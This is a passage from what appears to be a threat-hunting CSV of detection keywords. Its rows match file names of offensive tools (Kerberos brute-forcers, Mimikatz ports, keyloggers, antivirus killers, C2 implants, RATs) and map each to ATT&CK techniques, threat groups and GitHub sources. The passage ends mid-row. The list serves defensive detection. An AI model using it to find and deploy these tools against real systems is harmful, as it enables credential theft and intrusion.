"*/kerberos.py*",".{0,1000}\/kerberos\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","8328"
"*/kerberos-ldap-password-hunter*",".{0,1000}\/kerberos\-ldap\-password\-hunter.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","8329"
"*/kerberosticket.py*",".{0,1000}\/kerberosticket\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","8330"
"*/Kerbeus-BOF.git*",".{0,1000}\/Kerbeus\-BOF\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","1","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","8331"
"*/Kerbeus-BOF/*",".{0,1000}\/Kerbeus\-BOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","#linux","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","8332"
"*/kerbrute.git*",".{0,1000}\/kerbrute\.git.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","8333"
"*/kerbrute.go*",".{0,1000}\/kerbrute\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","8334"
"*/kerbrute.py*",".{0,1000}\/kerbrute\.py.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","8335"
"*/kerbrute/*",".{0,1000}\/kerbrute\/.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","8336"
"*/KernelMii.c*",".{0,1000}\/KernelMii\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tijme/kernel-mii","1","1","N/A","N/A","10","10","81","24","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z","8337"
"*/KExecDD.git*",".{0,1000}\/KExecDD\.git.{0,1000}","offensive_tool_keyword","KExecDD","Admin to Kernel code execution using the KSecDD driver","T1068 - T1055.011","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/floesen/KExecDD","1","1","N/A","N/A","8","3","244","41","2024-04-19T09:58:14Z","2024-04-19T08:54:49Z","8338"
"*/KeyCredentialLink.git*",".{0,1000}\/KeyCredentialLink\.git.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","1","N/A","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","8339"
"*/KeyCredentialLink.ps1*",".{0,1000}\/KeyCredentialLink\.ps1.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","1","N/A","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","8340"
"*/keylistattack.py*",".{0,1000}\/keylistattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8342"
"*/keylog.exe*",".{0,1000}\/keylog\.exe.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","1","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","8343"
"*/keylog.php*",".{0,1000}\/keylog\.php.{0,1000}","offensive_tool_keyword","BlackShades","remote access trojan (RAT) used by attackers to gain unauthorized control over a victim's computer","T1012 - T1059.001 - T1071.001 - T1105 - T1113 - T1125","TA0003 - TA0005 - TA0008 - TA0010 - TA0011","N/A","N/A","Malware","https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/BlackShades","1","1","N/A","N/A","10","10","2468","431","2025-04-15T16:14:10Z","2023-09-12T00:41:11Z","8344"
"*/KeyLogger.ahk*",".{0,1000}\/KeyLogger\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","8345"
"*/keylogger.cpp*",".{0,1000}\/keylogger\.cpp.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","10","10","159","44","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z","8346"
"*/KeyLogger.cs*",".{0,1000}\/KeyLogger\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","8347"
"*/Keylogger.dll*",".{0,1000}\/Keylogger\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","8348"
"*/keylogger.exe*",".{0,1000}\/keylogger\.exe.{0,1000}","offensive_tool_keyword","keylogger","Keyboard recording","T1056.001","TA0006 - TA0009","N/A","N/A","Collection","https://github.com/uknowsec/keylogger","1","1","N/A","N/A","9","2","140","35","2021-05-19T08:33:58Z","2020-11-10T07:15:50Z","8349"
"*/keylogger.exe*",".{0,1000}\/keylogger\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","10","10","159","44","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z","8350"
"*/keylogger.git*",".{0,1000}\/keylogger\.git.{0,1000}","offensive_tool_keyword","keylogger","Keyboard recording","T1056.001","TA0006 - TA0009","N/A","N/A","Collection","https://github.com/uknowsec/keylogger","1","1","N/A","N/A","9","2","140","35","2021-05-19T08:33:58Z","2020-11-10T07:15:50Z","8351"
"*/keylogger/*.*",".{0,1000}\/keylogger\/.{0,1000}\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","8352"
"*/keyscan.go*",".{0,1000}\/keyscan\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","8353"
"*/keywa7/releases/download/*",".{0,1000}\/keywa7\/releases\/download\/.{0,1000}","offensive_tool_keyword","keywa7","The tool that bypasses the firewall's Application Based Rules and lets you connect to anywhere","T1090.001 - T1071.004 - T1071.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/keywa7/keywa7","1","1","N/A","N/A","6","1","61","9","2024-08-19T08:09:33Z","2024-08-05T15:27:26Z","8354"
"*/KidLogger.app/*",".{0,1000}\/KidLogger\.app\/.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","8355"
"*/kidlogger.desktop*",".{0,1000}\/kidlogger\.desktop.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","8356"
"*/Kill_protector.py*",".{0,1000}\/Kill_protector\.py.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","1","N/A","N/A","10","","N/A","","","","8357"
"*/killav.*",".{0,1000}\/killav\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8358"
"*/KillAV.exe*",".{0,1000}\/KillAV\.exe.{0,1000}","offensive_tool_keyword","Burntcigar KillAV","Scans for process names linked to known antivirus or EDR products - then adds their process IDs to a stack for later termination - often used by attackers","T1089 - T1489 - T1562","TA0005","KillAV","Cuba","Malware","https://www.virustotal.com/gui/file/aeb044d310801d546d10b247164c78afde638a90b6ef2f04e1f40170e54dec03?nocache=1","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","8359"
"*/killav.py*",".{0,1000}killav\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","8360"
"*/killav.rb*",".{0,1000}\/killav\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8361"
"*/Killchain.ps1*",".{0,1000}\/Killchain\.ps1.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","1","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","8362"
"*/KillDefenderBOF*",".{0,1000}\/KillDefenderBOF.{0,1000}","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","1","N/A","N/A","10","3","224","30","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z","8363"
"*/killer.exe*",".{0,1000}\/killer\.exe.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","1","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","8364"
"*/Killer.git*",".{0,1000}\/Killer\.git.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","1","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","8365"
"*/KillEvenlogService.ps1*",".{0,1000}\/KillEvenlogService\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8366"
"*/KillEvenlogService.ps1*",".{0,1000}\/KillEvenlogService\.ps1.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","1","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","8367"
"*/kimi.py*",".{0,1000}\/kimi\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","8369"
"*/kintercept.py*",".{0,1000}\/kintercept\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8370"
"*/Kirby.ps1*",".{0,1000}\/Kirby\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","8371"
"*/kismet*",".{0,1000}\/kismet.{0,1000}","offensive_tool_keyword","kismet","Kismet is a wireless network and device detector. sniffer. wardriving tool. and WIDS (wireless intrusion detection) framework.","T1016 - T1040  -  T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kismetwireless/kismet","1","0","#linux","N/A","N/A","10","1711","316","2025-04-16T21:06:48Z","2016-09-20T13:26:00Z","8372"
"*/kismetwireless/*",".{0,1000}\/kismetwireless\/.{0,1000}","offensive_tool_keyword","kismet","Kismet is a wireless network and device detector. sniffer. wardriving tool. and WIDS (wireless intrusion detection) framework.","T1016 - T1040  -  T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kismetwireless/kismet","1","1","N/A","N/A","N/A","10","1711","316","2025-04-16T21:06:48Z","2016-09-20T13:26:00Z","8373"
"*/kitrap0d.*",".{0,1000}\/kitrap0d\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - 